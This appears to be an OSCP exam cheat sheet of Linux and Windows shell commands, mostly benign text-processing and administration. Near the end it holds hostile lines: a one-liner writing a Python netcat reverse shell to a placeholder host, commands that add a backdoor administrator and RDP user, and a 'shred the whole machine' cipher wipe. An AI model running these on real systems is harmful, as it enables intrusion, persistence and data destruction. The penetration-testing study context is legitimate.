OSCP
Search…
Linux / WindowsMain commands
1
Linux main commands in OSCP
2
Find:
3
find / -name file 2>/dev/null
4
ls -ltr - Sort list by last modified. -time -reverse
5
6
# Remove recursively and its content. Very dangerous command!
7
rm -rf ./directory
8
List what rights the sudo user has.
9
sudo -l
10
# This will send all permissions denied outputs to dev/null.
11
find / -name file 2>/dev/null
12
Which
13
Outputs the path of the binary that you are looking for. It searches through the directories that are defined in your $PATH variable.
14
which bash
15
# Usually outputs: /bin/bash
16
17
Filters
18
#sort
19
sort test.txt
20
#uniq
21
sort -u test.txt
22
sort test.txt | uniq
23
cat filename | sort -u > newFileName
24
grep
25
26
head
27
28
tail
29
30
tr
31
32
sed
33
sed "1d"
34
35
#cut :
36
64 bytes from 192.168.0.1: icmp_req=1 ttl=255 time=4.86 ms
37
cut -d" " -f4
38
-d stands for delimiter. and -f for field.
39
40
tr - Translate
41
Transform all letter into capital letters
42
tr "[:lower:]" "[:upper:]" < file1 > file2
43
44
Remove character
45
# Remove characters
46
cat file.txt | tr -d "."
47
48
# Remove all dots and replace them with underscore.
49
cat file.txt | tr "." "_"
50
51
awk
52
awk '/search_pattern/ { action_to_take_on_matches; another_action; }' file_to_parse
53
54
awk '/172.16.40.10.81/' error.log
55
56
awk '{print}' filename
57
58
We can use the -F flag to add a custom delimiter. : awk -F ':' '{print $1}' test.txt
59
60
So if you are manipulating some text you might want to start the output with some info about the columns or something like that. To do that we can use the BEGIN-keyword.
61
awk 'BEGIN {printf "IP-address \tPort\n"} /nop/ {print $3}' test.txt | head
62
awk 'BEGIN{printf "IP-address \tPort\n"} /nop/ {print $3} END {printf "End of the file\n"}' test.txt | tail
63
64
# list cronjobs
65
crontab -l
66
67
# Edit or create new cronjobs
68
crontab -e
69
70
#List all devices
71
fdisk -l
72
73
#Systemctl
74
systemctl start ssh
75
systemctl status ssh
76
systemctl stop ssh
77
78
Netstat - Find outgoing and incoming connections
79
Netstat is a multiplatform tool. So it works on both mac, windows and linux.
80
$ netstat -antlp
81
82
netstat -anpt
83
84
iptables -L
85
86
# Remove one specific rule
87
iptables -D INPUT 2
88
89
Copied!
Iteration over a file
1
This script will iterate over a file and echo out every single line:
2
#!/bin/bash
3
4
for line in $(cat file.txt);do
5
echo $line
6
done
7
Copied!
Another Way
1
2
#!/bin/bash
3
4
while read p; do
5
echo $p
6
done <file.txt
Copied!
For Loops
1
#!/bin/bash
2
3
for ((i = 0; i < 10; i++)); do
4
echo $i
5
done
6
7
Another way to write this is by using the program seq. Seq is pretty much like range() in python. So it can be used like this:
8
9
#!/bin/bash
10
11
for x in `seq 1 100`; do
12
echo $x
13
done
Copied!
1
#!/bin/bash
2
3
locate 646.c | tail -n 1
4
5
This can be done like this:
6
#!/bin/bash
7
8
cat $(locate 646.c | tail -n 1)
Copied!
VI Operators
1
VI -
2
Operators
3
Operators are commands that do things. Like delete, change or copy.
4
c - change
5
ce - change until end of the word.
6
c$ - change until end of line.
7
8
Combining Motions and Operators
9
Now that you know some motion commands and operator commands. You can start combining them.
10
dw - delete word
11
d$ - delete to the end of the line
Copied!
Password Creation
1
openssl passwd sam
2
Copied!
Windows Commands
1
cmd:
2
3
show hidden files:
4
dir /A
5
6
Print out file content, like cat
7
type file.txt
8
9
grep files
10
findstr file.txt
11
12
show network information
13
netstat -an
14
15
Show network adapter info
16
ipconfig
17
18
Traceroute
19
tracert
20
21
List processes
22
tasklist
23
24
Kill a process
25
taskkill /PID 1532 /F
26
27
Shreds the whole machine
28
ciper /w:C:\
29
30
Mounting - Mapping
31
wmic logicaldisk get deviceid, volumename, description
32
Copied!
Scripts for fun
1
Make Request:
2
import requests
3
4
req = requests.get("http://site.com")
5
print req.status_code
6
print req.text
7
8
Read and write to files
9
10
file_open = open("readme.txt", "r")
11
for line in file_open:
12
print line.strip("\n")
13
if line.strip("\n") == "rad 4":
14
print "last line"
15
16
17
echo 'import os; os.system("/bin/nc ip port -e /bin/bash")' > /opt/tmp.py
18
Copied!
Add RDP User
1
Windows
2
Add RDP user
3
net user hodor Qwerty123! /add
4
net localgroup administrators hodor /add
5
net localgroup "Remote Desktop Users" hodor /add
Copied!
Enable RDP via Registry
1
Enable rdp via regsitry
2
Copied!
Copy link